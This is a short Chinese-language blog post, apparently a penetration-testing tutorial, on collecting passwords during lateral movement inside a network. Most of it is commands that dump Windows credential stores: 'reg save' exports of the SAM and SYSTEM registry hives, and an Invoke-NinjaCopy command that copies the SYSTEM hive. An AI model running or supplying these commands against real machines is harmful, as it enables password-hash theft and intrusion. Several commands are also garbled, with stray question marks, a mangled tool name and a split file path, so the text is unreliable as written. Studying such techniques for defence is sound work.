内网横向渗透之密码搜集(内网横向渗透 实战)

作者:浩楠
围观群众:31
更新于

本文仅用于技术讨论与研究,对于文中所有的工具以及命令,都是本人自行搭建的环境进行测试的。文中使用的技术仅用于学习教育目的,如果文中出现的技术用于其他任何目的及目标,作者概不负责。

二、常见的方法

1.抓取本地SAM文件中的密码 从注册表中导出

reg save HKLM\SYSTEM sys.hiv ? #获取SYSTEM注册表信息,导出为sys.hiv文件

reg save HKLM\SAM sam.hiv ? ? ? ? ? #获取SAM注册表信息,导出为sam.hiv文件

2.还可以使用nihs_x0008_ng中的Invoke-NinjaCopy.ps1脚本导出

①导出SAM文件 Invoke-NinjaCopy -Path "C:\Windows\System32\con fig\SYSTEM" -LocalDestination "C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-NinjaCopy\sys.hiv"